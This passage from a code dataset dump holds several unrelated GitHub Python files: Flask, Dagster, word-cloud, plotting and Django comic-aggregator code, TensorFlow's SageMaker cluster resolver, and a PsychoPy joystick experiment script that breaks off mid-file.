add=Course_Student(courseid,add_data['studentid'])\r\n db.session.add(add)\r\n db.session.commit()\r\n return 
jsonify({'status':'success','data':'','error':''})\r\n","repo_name":"yypnogg1011/16_daoyun","sub_path":"flask/app_student/app_student_op.py","file_name":"app_student_op.py","file_ext":"py","file_size_in_byte":7631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"} +{"seq_id":"4663166460","text":"import os\n\nfrom dagster import default_executors\nfrom dagster import ModeDefinition\nfrom dagster import pipeline\nfrom dagster import PresetDefinition\nfrom dagster import ScheduleDefinition\n\nfrom .solids import step_five\nfrom .solids import step_four\nfrom .solids import step_one\nfrom .solids import step_seven\nfrom .solids import step_six\nfrom .solids import step_three\nfrom .solids import step_two\n\n### MODE\nlocal_mode = ModeDefinition(\n name=\"local\",\n executor_defs=default_executors,\n resource_defs={},\n)\n\n### PRESETS\nprod_preset = PresetDefinition.from_pkg_resources(\n name=\"prod\",\n mode=\"local\",\n pkg_resource_defs=[\n (\"pipelines_cookbook.cookbook.environments\", \"prod.yaml\"),\n ],\n)\n\ndev_preset = PresetDefinition.from_pkg_resources(\n name=\"dev\",\n mode=\"local\",\n pkg_resource_defs=[\n (\"pipelines_cookbook.cookbook.environments\", \"dev.yaml\"),\n ],\n)\n\n\n### PIPELINES\n@pipeline(mode_defs=[local_mode], preset_defs=[dev_preset, prod_preset])\ndef cookbook():\n one = step_one()\n two = step_two()\n three = step_three(one, two)\n\n four = step_four()\n five = step_five()\n six = step_six(four, five)\n\n step_seven(three, six)\n\n\n### REPOSITORY\npipelines = [cookbook]\n\nschedules = [\n ScheduleDefinition(\n name=\"cookbook\",\n cron_schedule=\"* * * * *\",\n pipeline_name=\"cookbook\",\n run_config=prod_preset.run_config,\n environment_vars=dict(os.environ),\n execution_timezone=\"Asia/Bangkok\",\n mode=\"local\",\n )\n]\n\nrepo = pipelines + 
schedules\n","repo_name":"devbaygroup/dagster-demo","sub_path":"pipelines_cookbook/cookbook/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"72265681001","text":"import jieba\r\nfrom wordcloud import WordCloud as wc\r\nfrom imageio import imread\r\n\r\ns=\"浅复制模式只能独立第一层,\\\r\n也就是说原变量和继承变量在可迭代对象中依然会同步修改。\"\r\n\r\nprint(s)\r\n\r\nprint(jieba.lcut(s)) #精确模式\r\nprint(jieba.lcut(s,cut_all=True)) #全模式\r\nprint(jieba.lcut_for_search(s)) #搜索引擎模式\r\n\r\ntemp=imread('3.png')\r\ntxt='蓝图上的落差终归只是理念上的区分,\\\r\n在实践场域的分野也未必明晰。\\\r\n譬如当我们追寻心之所向时,在途中涉足权力的玉墀,\\\r\n这究竟是伴随着期望的泯灭还是期望的达成?\\\r\n在我们塑造生活的同时,生活也在浇铸我们。\\\r\n既不可否认原生的家庭性与社会性,又承认自己的图景有轻狂的失真,\\\r\n不妨让体验走在言语之前。\\\r\n用不被禁锢的头脑去体味切斯瓦夫·米沃什的大海与风帆,\\\r\n并效维特根斯坦之言,对无法言说之事保持沉默。'\r\ntxt_list=jieba.lcut(txt)\r\nnew_txt=' '.join(txt_list)\r\n\r\npic=wc(scale=1.5,min_font_size=20,\r\n max_font_size=80,font_path='C:\\Windows\\Fonts\\msyh.ttc',\r\n mask=temp,background_color='white').generate(new_txt)\r\npic.to_file('words.png')\r\n","repo_name":"LemaxLMX/remote01","sub_path":"IDLE/jieba_and_wc_test.py","file_name":"jieba_and_wc_test.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72974675239","text":"# ASCII art printer\nfrom pyfiglet import figlet_format\nfrom termcolor import colored\n\n\ndef print_art(message, color):\n \"\"\"print_art(message, color) prints ASCII art in specified color.\"\"\"\n official_termcolors = ('red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'white')\n\n if color not in official_termcolors:\n color = 'magenta'\n\n ascii_art = figlet_format(message)\n colored_ascii = colored(ascii_art, color=user_color)\n print(ascii_art)\n\n\nprint(\"Welcome to ASCII Art Printer\")\nuser_message = str(input(\"What would you like to print? \"))\nuser_color = str(input(\"What color? 
\"))\nprint_art(user_message, user_color)\n","repo_name":"benj-lazaro/modern-python3-bootcamp","sub_path":"22-modules/07-ascii-art.py","file_name":"07-ascii-art.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4199020329","text":"import numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport plotly.figure_factory as ff\nfrom plotly.offline import iplot\nfrom plotly.subplots import make_subplots\nimport plotly.graph_objects as go\nimport plotly.express as px\nimport streamlit as st\n\n\n@st.cache()\ndef plot_distribution(dataframe, var_select=None, bins=1.0): \n df = dataframe.copy()\n # Calculate the correlation coefficient between the new variable and the target\n df[\"Churn\"] = df['Churn'].replace({\"Yes\":1, \"No\":0})\n tmp_churn = df[df['Churn'] == 1]\n tmp_no_churn = df[df['Churn'] == 0] \n corr = df['Churn'].corr(df[var_select])\n corr = np.round(corr,3)\n tmp1 = tmp_churn[var_select].dropna()\n tmp2 = tmp_no_churn[var_select].dropna()\n hist_data = [tmp1, tmp2]\n \n group_labels = ['Churned', 'Not churned']\n colors = ['indianred','seagreen' ]\n\n fig = ff.create_distplot(hist_data,\n group_labels,\n colors = colors, \n show_hist = True,\n curve_type='kde', \n bin_size = bins\n )\n \n fig['layout'].update(title = var_select+' '+'(Correlation with Churn ='+ str(corr)+')')\n # iplot(fig, filename = 'Density plot')\n\n return fig\n\n\n@st.cache()\ndef binary_ploting_distributions(dataframe, cat_col):\n df = dataframe.copy()\n \n fig = make_subplots(rows=1,cols=2,print_grid=True,horizontal_spacing=0.2, \n subplot_titles=(\"Distribution and % Churn\", \n f'Mean Monthly Charges of {cat_col}'))\n\n df[\"Churn\"] = df['Churn'].replace({\"Yes\":1, \"No\":0})\n tmp_churn = df[df['Churn'] == 1]\n tmp_no_churn = df[df['Churn'] == 0]\n # calculate churn / total count of categorical variables \n tmp_attr = 
round(tmp_churn[cat_col].value_counts().sort_index() / df[cat_col].value_counts().sort_index(),2)*100\n\n t1 = tmp_churn[cat_col].value_counts().sort_index()\n t2 = df[cat_col].value_counts().sort_index().rename(f'Total-{cat_col}')\n data_points = pd.concat([t1, t2], axis=1)\n\n data_points.columns = ['Churn Count', 'Total']\n data_points['Churned %'] = round((data_points['Churn Count'] / data_points['Total']) * 100, 2)\n \n\n\n trace1 = go.Bar(\n x=tmp_churn[cat_col].value_counts().sort_index().index,\n y=tmp_churn[cat_col].value_counts().sort_index().values,\n name='Churned',opacity = 0.8, marker=dict(\n color='indianred',\n line=dict(color='#000000',width=1)))\n\n trace2 = go.Bar(\n x=tmp_no_churn[cat_col].value_counts().sort_index().index,\n y=tmp_no_churn[cat_col].value_counts().sort_index().values,\n name='Not Churned', opacity = 0.8, \n marker=dict(\n color='seagreen',\n line=dict(color='#000000',\n width=1)\n )\n )\n\n trace3 = go.Scatter( \n x=tmp_attr.sort_index().index,\n y=tmp_attr.sort_index().values,\n yaxis = 'y2',\n name='% Churn', opacity = 0.6, \n marker=dict(\n color='black',\n line=dict(color='#000000',\n width=2 )\n )\n )\n df_tmp = (df.groupby(['Churn', cat_col])['MonthlyCharges'].mean().reset_index())\n tmp_churn = df_tmp[df_tmp['Churn'] == 1]\n tmp_no_churn = df_tmp[df_tmp['Churn'] == 0]\n\n df_tmp = (df.groupby(['Churn', cat_col])['MonthlyCharges'].mean()).unstack('Churn').reset_index()\n df_tmp['diff_rate'] = round((df_tmp[1] / df_tmp[0]) - 1,2) * 100\n\n trace4 = go.Bar(\n x=tmp_churn[cat_col],\n y=tmp_churn['MonthlyCharges'], showlegend=False,\n name='Mean Charge Churn',opacity = 0.8, marker=dict(\n color='indianred',\n line=dict(color='#000000',width=1)))\n\n trace5 = go.Bar(\n x=tmp_no_churn[cat_col],\n y=tmp_no_churn['MonthlyCharges'],showlegend=False,\n name='Mean Charge NoChurn', opacity = 0.8, \n marker=dict(\n color='seagreen',\n line=dict(color='#000000',\n width=1)\n )\n )\n\n trace6 = go.Scatter( \n x=df_tmp[cat_col],\n 
y=df_tmp['diff_rate'],\n yaxis = 'y2',\n name='% Diff Churn', opacity = 0.6, \n marker=dict(\n color='black',\n line=dict(color='#000000',\n width=5 )\n )\n )\n\n fig.append_trace(trace1, 1, 1)\n fig.append_trace(trace2, 1, 1) \n fig.append_trace(trace3, 1, 1)\n fig.append_trace(trace4, 1, 2)\n fig.append_trace(trace5, 1, 2)\n fig.append_trace(trace6, 1, 2) \n\n fig['data'][2].update(yaxis='y3')\n fig['data'][5].update(yaxis='y4')\n\n fig['layout']['xaxis'].update(autorange=True,\n tickfont=dict(size= 10), \n title= f'{cat_col}', \n type= 'category',\n )\n fig['layout']['yaxis'].update(title= 'Count')\n\n fig['layout']['xaxis2'].update(autorange=True,\n tickfont=dict(size= 10), \n title= f'{cat_col}', \n type= 'category',\n )\n fig['layout']['yaxis2'].update( title= 'Mean Monthly Charges' )\n\n fig['layout']['yaxis3']=dict(range= [0, 100], #right y-axis in subplot (1,1)\n overlaying= 'y', \n anchor= 'x', \n side= 'right', \n showgrid= False, \n title= '%Churn Ratio'\n )\n\n #Insert a new key, yaxis4, and the associated value:\n fig['layout']['yaxis4']=dict(range= [-20, 100], #right y-axis in the subplot (1,2)\n overlaying= 'y2', \n anchor= 'x2', \n side= 'right', \n showgrid= False, \n title= 'Monthly % Difference'\n )\n fig['layout']['title'] = f\" Distributions of {cat_col} (Total Churned / Not Churned and % of Total Churned / Not Churned)\"\n fig['layout']['height'] = 500\n fig['layout']['width'] = 1200\n \n df_tmp.columns = [cat_col, 'NotChurned', \"Churned\", \"Difference\"]\n return fig, data_points, df_tmp\n\n\n\ncolor_op = ['#5527A0', '#BB93D7', '#834CF7', '#6C941E', '#93EAEA', '#7425FF', '#F2098A', '#7E87AC', \n '#EBE36F', '#7FD394', '#49C35D', '#3058EE', '#44FDCF', '#A38F85', '#C4CEE0', '#B63A05', \n '#4856BF', '#F0DB1B', '#9FDBD9', '#B123AC']\n\n\ndef plot_pie(dataframe, df_cat, df_value, limit=15):\n\n df = dataframe.copy()\n\n df[\"Churn\"] = df['Churn'].replace({\"Yes\":1, \"No\":0})\n tmp_churn = df[df['Churn'] == 
1].groupby(df_cat)[df_value].sum().nlargest(limit).to_frame().reset_index()\n tmp_no_churn = df[df['Churn'] == 0].groupby(df_cat)[df_value].sum().nlargest(limit).to_frame().reset_index()\n\n p1= go.Pie(labels = tmp_churn[df_cat], values=tmp_churn[df_value], name='Churn', hole=0.5, domain= {'x': [0, .5]})\n p2 = go.Pie(labels = tmp_no_churn[df_cat], values=tmp_no_churn[df_value], name='No Churn', hole=0.5,domain= {'x': [.5, 1]} )\n layout = dict(title= f\"Total {df_value} by {df_cat}\" , height=450,width=1200, font=dict(size=15),\n annotations = [\n dict(\n x=.22, y=.5,\n text='Churn', \n showarrow=False,\n font=dict(size=20)\n ),\n\n dict(\n x=.8, y=.5,\n text='No Churn', \n showarrow=False,\n font=dict(size=20)\n ),\n \n ])\n\n fig = dict(data=[p1, p2], layout=layout)\n\n\n \n return fig, tmp_churn, tmp_no_churn ","repo_name":"pratik-poudel/churn-prediction","sub_path":"utils/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":8054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3419471855","text":"#!/usr/bin/env python\n\nimport click\nimport analyzer\n\nimport os\nimport pathlib\n\n@click.command()\n@click.argument(\"layout\")\ndef main(layout):\n layout_path = pathlib.Path(f\"layouts/{layout}\")\n if not layout_path.exists():\n print(f\"layouts/{layout} not found\")\n return -1\n\n analyzer.analyze(layout_path)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Apsu/chordite","sub_path":"chordite.py","file_name":"chordite.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"70695669479","text":"import numpy as np\nimport tensorflow as tf\n\ndef get_angles(pos, i, d_model):\n angle_rates = 1 / np.power(10000, (2 * (i//2)) / np.float32(d_model))\n return pos * angle_rates\n\n\ndef positional_encoding(position, d_model):\n angle_rads = get_angles(np.arange(position)[:, 
np.newaxis],\n np.arange(d_model)[np.newaxis, :],\n d_model)\n\n # apply sin to even indices in the array; 2i\n angle_rads[:, 0::2] = np.sin(angle_rads[:, 0::2])\n\n # apply cos to odd indices in the array; 2i+1\n angle_rads[:, 1::2] = np.cos(angle_rads[:, 1::2])\n\n pos_encoding = angle_rads[np.newaxis, ...]\n\n return tf.cast(pos_encoding, dtype=tf.float32)","repo_name":"HRSadeghi/NeuralPersianPoet","sub_path":"models/layers/transformer_utils.py","file_name":"transformer_utils.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"18"} +{"seq_id":"8843006820","text":"# -*- coding: utf-8 -*-\nfrom math import atan, sqrt\nfrom django.contrib.auth.models import User\nfrom django.core.urlresolvers import reverse\nfrom django.db import models\nfrom comicagg.comics.fields import ComicNameField, AltTextField\nfrom comicagg.accounts.models import UserProfile\n\nclass Comic(models.Model):\n \"\"\"\n Comics can be: A active, E ended\n \n E/A T F\n T - 2\n F 1 3\n 1. Active AND not Ended - all ok, ongoing\n 2. Not active AND Ended - finished\n 3. Not active and not Ended - not working, needs fixing\n So visible to the user should be 1 and 2\n \"\"\"\n\n name = ComicNameField('Name', max_length=255)\n website = models.URLField(\"Website\")\n active = models.BooleanField('Is active?', default=False, help_text='The comic is ongoing and gets epdated regularly.')\n notify = models.BooleanField('Notify the users?', default=False,\n help_text=\"\"\"This is always disabled. If it's enabled when saving the comic, the users will be notified of the new comic.\"\"\")\n ended = models.BooleanField('Has ended?', default=False,\n help_text='Check this if the comic has ended. 
Also mark it as inactive.')\n no_images = models.BooleanField(\"Don't show images?\", default=False,\n help_text='Use it to hide the images of the comic, but allow a notification to the users.')\n\n custom_func = models.TextField('Custom update function', null=True, blank=True,\n help_text='Check the docs for reference.')\n\n # First regex section\n re1_url = models.URLField('URL of the page where the image can be found', null=True, blank=True,\n help_text='If the redirection URL is used, this field will not be used.')\n re1_base = models.CharField('Base URL for the image URL', max_length=255, null=True, blank=True,\n help_text='It must contain the placeholder %s which will be replaced with whatever matches in the regex.')\n re1_re = models.CharField('Regular expression', max_length=255, null=True, blank=True,\n help_text=\"\"\"It must contain one group (between parentheses) that matches the URL of the image.\n Named groups can also be used:
    \n - url for the URL of the image: (?P<url>.+)
    \n - alt for the alternative text of the image: (?P<alt>.+)\"\"\")\n re1_backwards = models.BooleanField('Check backwards.', default=False,\n help_text=\"Read the page backwards by line (last line first).\")\n\n # Second regex section\n re2_url = models.URLField('URL where the page of the image can be found', null=True, blank=True,\n help_text=\"\"\"Setting this enables the redirection. The engine will open this URL and\n use the regex in this section to search for the URL of the page where the image can be found.\"\"\")\n re2_base = models.CharField('Base URL for the page URL', max_length=255, null=True, blank=True,\n help_text='It must contain the placeholder %s which will be replaced with whatever matches in the regex.')\n re2_re = models.CharField('Regular expression', max_length=255, null=True, blank=True,\n help_text=\"\"\"It must contain one group (between parentheses) that matches the URL of the page.\n Named groups can also be used:
    \n - url for the URL of the page: (?P<url>.+)\"\"\")\n re2_backwards = models.BooleanField('Check backwards.', default=False,\n help_text=\"Read the page backwards by line (last line first).\")\n\n # Other settings\n # FUTURE: Consider removing this and always use the first URL as referer\n referer = models.URLField('Referer', null=True, blank=True,\n help_text='Set this to a URL that the web will accept as referer when getting an update.')\n\n last_update = models.DateTimeField('Last update', blank=True)\n last_image = models.URLField('Last image URL', blank=True)\n last_image_alt_text = AltTextField('Last image alt text', blank=True, null=True)\n\n positive_votes = models.IntegerField('Positive votes', default=0)\n total_votes = models.IntegerField('Total votes', default=0)\n\n add_date = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n ordering = ['name']\n permissions = (\n (\"all_images\", \"Can see all images\"),\n )\n\n def __init__(self, *args, **kwargs):\n super(Comic, self).__init__(*args, **kwargs)\n self._reader_count = None\n self._strip_count = None\n\n def __str__(self):\n return self.name\n\n def save(self, *args, **kwargs):\n notify = False\n # If the user saved this with the notify field to true\n if self.notify:\n notify = True\n self.notify = False\n super(Comic, self).save(*args, **kwargs)\n if notify:\n # Create a NewComic object for each user\n users = User.objects.all()\n for user in users:\n up = UserProfile.objects.get(user=user)\n if up.alert_new_comics:\n up.new_comics = True\n new = NewComic(user=user, comic=self)\n new.save()\n up.save()\n\n def get_rating(self, method='statistic_rating'):\n if not hasattr(self, '__rating'):\n r = getattr(self, method)()\n setattr(self, '__rating', r)\n return getattr(self, '__rating')\n\n def statistic_rating(self):\n pos = self.positive_votes\n n = self.total_votes\n if n == 0:\n return 0.0\n #z = Statistics2.pnormaldist(1-power/2)\n z = 3.95\n phat = 1.0*pos/n\n return 
(phat+z*z/(2*n)-z*sqrt((phat*(1-phat)+z*z/(4*n))/n))/(1+z*z/n)\n\n def mi_rating(self):\n r = 0.5\n if self.total_votes > 0:\n #p = self.positive_votes\n #n = self.total_votes - self.positive_votes\n #x = p - n\n x = 2 * self.positive_votes - self.total_votes\n if x > 0:\n r = ((20-atan(x/5.0)/(x/100.0))/40+0.5)\n elif x < 0:\n r = (0.5-(20-atan(x/5.0)/(x/100.0))/40)\n #porcentaje de votos positivos\n #r = int(floor(self.positive_votes / float(self.total_votes) * 100))\n #porcentaje de votos negativos\n #n = 100 - r\n #g(x)=2/sqrt(pi)*(x-x^3/3+x^5/10-x^7/42+x^9/216)\n return r\n\n def positive_votes_perc(self):\n try:\n r = float(self.positive_votes) / self.total_votes\n except:\n r = 0.0\n return r\n\n def negative_votes(self):\n return self.total_votes - self.positive_votes\n\n def reader_count(self):\n if not self._reader_count:\n self._reader_count = self.subscription_set.count()\n return int(self._reader_count)\n\n def strip_count(self):\n if not self._strip_count:\n self._strip_count = self.comichistory_set.count()\n return int(self._strip_count)\n\n def last_image_url(self):\n url = self.last_image\n if self.referer:\n url = reverse('comics:last_image_url', kwargs={'cid':self.id})\n return url\n\n def last_strip(self):\n return self.comichistory_set.all()[0]\n\n # User related methods\n # FUTURE: Remove this? Still used in views\n def unread_comics_for(self, user):\n return UnreadComic.objects.filter(comic=self, user=user)\n\n# FUTURE: We may want to move this elsewhere\ndef active_comics():\n \"\"\"Returns a QuerySet of Comic objects that a user can follow. 
Includes ended comics.\"\"\"\n # FUTURE: Should not include ended comics?\n return Comic.objects.exclude(active=False)\n\nclass Subscription(models.Model):\n \"\"\"A user follows a certain comic and the position of the comic in the reading list.\"\"\"\n\n user = models.ForeignKey(User)\n comic = models.ForeignKey(Comic)\n position = models.PositiveIntegerField(blank=True, default=0)\n\n class Meta:\n ordering = ['user', 'position']\n\n def __str__(self):\n return '%s - %s' % (self.user, self.comic)\n\n def delete(self, *args, **kwargs):\n # Delete the related unread comics\n UnreadComic.objects.filter(user=self.user, comic=self.comic).delete()\n super(Subscription, self).delete(*args, **kwargs)\n\nclass Request(models.Model):\n user = models.ForeignKey(User)\n url = models.URLField()\n comment = models.TextField(blank=True, null=True, default=\"\")\n admin_comment = models.TextField(blank=True, null=True, default=\"\")\n done = models.BooleanField(default=False)\n rejected = models.BooleanField(default=False)\n\n class Meta:\n ordering = ['id', '-done']\n\n def __str__(self):\n return '%s - %s' % (self.user, self.url)\n\n# FUTURE: Rename this to ComicStrip\nclass ComicHistory(models.Model):\n comic = models.ForeignKey(Comic)\n date = models.DateTimeField(auto_now_add=True)\n url = models.CharField(max_length=255)\n alt_text = AltTextField('Alternative text', blank=True, null=True)\n\n class Meta:\n ordering = ['-id']\n get_latest_by = \"date\"\n\n def __str__(self):\n return '%s %s' % (self.comic.name, self.date)\n\n def image_url(self):\n url = self.url\n if self.comic.referer:\n url = reverse('comics:history_url', kwargs={'hid':self.id})\n return url\n\nclass UnreadComic(models.Model):\n user = models.ForeignKey(User)\n history = models.ForeignKey(ComicHistory)\n comic = models.ForeignKey(Comic)\n \n class Meta:\n ordering = ['user', '-history']\n\n def __str__(self):\n return '%s %s' % (self.user, self.history)\n \n\nclass Tag(models.Model):\n user = 
models.ForeignKey(User)\n comic = models.ForeignKey(Comic)\n name = models.CharField(max_length=255)\n \n class Meta:\n ordering = ['name', 'comic']\n\n def __str__(self):\n return '%s' % (self.name)\n #return '%s - %s - %s' % (self.name, self.comic, self.user)\n \nclass NewComic(models.Model):\n user = models.ForeignKey(User)\n comic = models.ForeignKey(Comic, related_name=\"new_comics\")\n \n def __str__(self):\n return '%s - %s' % (self.user, self.comic)\n","repo_name":"comicagg/comicagg","sub_path":"comicagg/comics/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10093,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"4001574404","text":"import json\nimport os\n\nfrom tensorflow.python.distribute.cluster_resolver.cluster_resolver import ClusterResolver\nfrom tensorflow.python.training.server_lib import ClusterSpec\n\n# List of envs\n# https://github.com/aws/sagemaker-training-toolkit/blob/master/ENVIRONMENT_VARIABLES.md\n# Only support Multi-Worker Mirrored Strategy\n\n_SESSION_MASTER_KEY = 'session_master'\n_RPC_LAYER_KEY = 'rpc_layer'\n_TASK_KEY = 'task'\n_CLUSTER_KEY = 'cluster'\n_WORKER_KEY = 'worker'\n_INDEX_KEY = 'index'\n_TYPE_KEY = 'type'\n\n_SM_CURRENT_HOST = 'SM_CURRENT_HOST'\n_SM_HOSTS = 'SM_HOSTS'\n\n\ndef format_master_url(master, rpc_layer=None):\n if rpc_layer:\n return '%s://%s' % (rpc_layer, master)\n else:\n return master\n\n\ndef _load_tf_config(port):\n # Create a tf_config from SM Variables\n assert all([x in os.environ for x in [_SM_CURRENT_HOST, _SM_HOSTS]\n ]), 'Not a SageMaker Environment'\n hosts = sorted(json.loads(\n os.environ[_SM_HOSTS])) if os.environ[_SM_HOSTS] != '' else []\n current_host = os.environ[_SM_CURRENT_HOST]\n\n if current_host not in hosts:\n return {}\n\n host_index = hosts.index(current_host)\n # Assign ports\n hosts = ['%s:%s' % (host, port) for host in hosts]\n\n tf_config = {\n _CLUSTER_KEY: {\n _WORKER_KEY: hosts\n },\n 
_TASK_KEY: {\n _TYPE_KEY: _WORKER_KEY,\n _INDEX_KEY: host_index\n }\n }\n return tf_config\n\n\ndef _get_value_in_tfconfig(key, port, default=None):\n tf_config = _load_tf_config(port)\n return tf_config[key] if key in tf_config else default\n\n\nclass SageMakerClusterResolver(ClusterResolver):\n \"\"\"Implementation of a ClusterResolver which reads the Sagemaker EnvVars. This is an implementation of cluster resolvers when running in a SageMaker environment to set information about the cluster.\n\n The cluster spec returned will be initialized from the SageMaker\n environment variables.\n Currently this Cluster Resolver only supports Multi-Worker Mirrored Strategy.\n It assumes all nodes in a SageMaker Cluster are workers.\n \"\"\"\n\n def __init__(self,\n port=2223,\n task_type=None,\n task_id=None,\n rpc_layer=None,\n environment=None):\n \"\"\"Creates a new SageMakerClusterResolver.\n\n Args:\n port: (integer, optional) Override default port usage of 2223\n task_type: (String, optional) Overrides the task type.\n task_id: (Integer, optional) Overrides the task index.\n rpc_layer: (String, optional) Overrides the rpc layer TensorFlow uses.\n environment: (String, optional) Overrides the environment TensorFlow\n operates in.\n \"\"\"\n self._task_type = task_type\n self._task_id = task_id\n self._rpc_layer = rpc_layer\n self._environment = environment\n self._port = str(port)\n\n @property\n def task_type(self):\n if self._task_type is None:\n task_info = _get_value_in_tfconfig(_TASK_KEY, self._port, {})\n return str(task_info['type']) if 'type' in task_info else None\n else:\n return str(self._task_type)\n\n @property\n def task_id(self):\n if self._task_id is None:\n task_info = _get_value_in_tfconfig(_TASK_KEY, self._port, {})\n return int(task_info['index']) if 'index' in task_info else None\n else:\n return int(self._task_id)\n\n @task_type.setter\n def task_type(self, task_type):\n self._task_type = task_type\n\n @task_id.setter\n def task_id(self, 
task_id):\n self._task_id = task_id\n\n @property\n def environment(self):\n return self._environment\n\n @property\n def rpc_layer(self):\n if self._rpc_layer is None:\n return _get_value_in_tfconfig(_RPC_LAYER_KEY, self._port)\n else:\n return self._rpc_layer\n\n @rpc_layer.setter\n def rpc_layer(self, rpc_layer):\n self._rpc_layer = rpc_layer\n\n def num_accelerators(self, task_type=None, task_id=None, config_proto=None):\n task_type = self.task_type if task_type is None else task_type\n task_id = self.task_id if task_id is None else task_id\n return super(SageMakerClusterResolver,\n self).num_accelerators(task_type, task_id, config_proto)\n\n def cluster_spec(self):\n \"\"\"Returns a ClusterSpec based on the SageMaker environment variables.\n\n Returns:\n A ClusterSpec with information from the SageMaker environment variables.\n \"\"\"\n tf_config = _load_tf_config(self._port)\n if 'cluster' not in tf_config:\n return ClusterSpec({})\n return ClusterSpec(tf_config['cluster'])\n\n def master(self, task_type=None, task_id=None, rpc_layer=None):\n \"\"\"Returns the master address to use when creating a TensorFlow session.\n\n Note: this is only useful for TensorFlow 1.x.\n\n Args:\n task_type: (String, optional) Overrides and sets the task_type of the\n master.\n task_id: (Integer, optional) Overrides and sets the task id of the master.\n rpc_layer: (String, optional) Overrides and sets the protocol over which\n TensorFlow nodes communicate with each other.\n\n Returns:\n The address of the master.\n\n Raises:\n RuntimeError: If the task_type or task_id is not specified and the\n SageMaker environment variables does not contain a task section.\n \"\"\"\n\n # If `session_master` is set, just use that.\n session_master = _get_value_in_tfconfig(_SESSION_MASTER_KEY, self._port)\n if session_master is not None:\n return session_master\n\n # Return an empty string if we are the only job in the ClusterSpec.\n cluster_spec = self.cluster_spec()\n if (not cluster_spec.jobs 
or\n (len(cluster_spec.jobs) == 1 and\n len(cluster_spec.job_tasks(cluster_spec.jobs[0])) == 1)):\n return ''\n\n # We try to auto-detect the task type and id, but uses the user-supplied one\n # where available\n task_type = task_type if task_type is not None else self.task_type\n task_id = task_id if task_id is not None else self.task_id\n rpc_layer = rpc_layer if rpc_layer is not None else self.rpc_layer\n\n return format_master_url(\n cluster_spec.task_address(task_type, task_id), rpc_layer)\n","repo_name":"tensorflow/tensorflow","sub_path":"tensorflow/python/distribute/cluster_resolver/sagemaker_cluster_resolver.py","file_name":"sagemaker_cluster_resolver.py","file_ext":"py","file_size_in_byte":6029,"program_lang":"python","lang":"en","doc_type":"code","stars":178918,"dataset":"github-code","pt":"18"} +{"seq_id":"23819291221","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- bonus\n\nfrom __future__ import absolute_import, division\nfrom psychopy import prefs\nfrom psychopy import gui, visual, core, data, event, logging, colors\nfrom psychopy.constants import (NOT_STARTED, STARTED, STOPPED, FINISHED)\nimport numpy as np\nimport pandas as pd\nfrom psychopy.hardware import keyboard\nfrom IV_functions import (input_dialog, open_window, load_joystick, make_vis_stimuli,\n make_trialMat, ready_phase, target_onset, fore_period, reach_phase, feedback_phase,\n start_splash, bonus_screen,iti_phase, get_serial_port, wait4tr_start, config_eyetracker)\nfrom os import chdir, path\nimport pickle\n#import pylink\n#from EyeLinkCoreGraphicsPsychoPy import EyeLinkCoreGraphicsPsychoPy\n\nchdir('directory/to/where/code/is/saved')\nfmri=False\n\nseq=pd.read_csv('images/sequence1.csv',header=None)\n\npar = {\"expName\":\"IV\",\n \"trials\":len(seq),\n \"trials\":100,\n \"gain\":1.5,\n \"screen_res\":(1680,1050),\n \"screenW\":15*2.54,\n \"dist\":57,\n \"cue_time\":0.2,\n \"regular_bonus\":\"$0.20\",\n \"jackpun_bonus\":\"$1.60\",\n \"target_hold\":0.8,\n \"RT_crit\":1.87,\n 
\"feedback_time\":1,\n \"text_size\":.05}\n\nvis_par = {\"target1xy\":[-.5,.25],\n \"target2xy\":[.5,.25],\n \"startxy\":[0,-.25],\n \"target_r_deg\":1.2,\n \"cursor_r_deg\":.5,\n \"joy_off\":[0.00684262,0.15542522]}\n\nexpInfo = {\"Participant\" :\"\",\"Session\" :\"\", \"Date\":data.getDateStr()}\ninput_dialog(par,expInfo,visual,gui,core) #Dialog box\nwin,par = open_window(visual,par) #Open a window\n\n#el_tracker,edf_file = config_eyetracker(pylink,expInfo,EyeLinkCoreGraphicsPsychoPy,win,visual,path,event)\n#el_tracker.openDataFile(edf_file)\n#el_tracker.startRecording(1, 1, 1, 1)\n\n##WILL NOW WAIT FOR SCANNER TRIGGER\n\nif fmri:\n serial_port = get_serial_port()\n first_tr = wait4tr_start(serial_port[0],core)\nelse:\n first_tr = core.getTime()\npar[\"first_tr\"]=first_tr\n\njoy = load_joystick() #Load joystick\n\nimgComponents,cursor,vis_par,cues,feedback,bonus = make_vis_stimuli(visual,win,vis_par,par) #Make visual stimuli\n\ntrialMat,bonuses = make_trialMat(par,np,pd,par[\"trials\"])\n\ntrial_pars = []\n\ncursor = start_splash(win,imgComponents,cursor,par,vis_par,joy,core,visual,np,'to begin, move cursor away from start position')\n\nfor trial in range(0,par[\"trials\"]):\n \n trial_par = {\"targetxy\":vis_par[trialMat.targetxy[trial]],\n \"cue\":seq.iloc[trial,0]-1,\n \"bonus\":bonuses[seq.iloc[trial,0]-1],\n \"start_hold\":seq.iloc[trial,1],\n \"forep\":seq.iloc[trial,2],\n \"jumped_gun\":0}\n \n cursor,trial_par = iti_phase(win,imgComponents,cursor,par,vis_par,joy,core,np,trial_par)\n \n cursor,trial_par = ready_phase(win,imgComponents,cursor,par,vis_par,joy,core,np,trial_par)\n #print(np.diff(trial_par[\"ready_vbl\"]))\n \n cursor,trial_par = 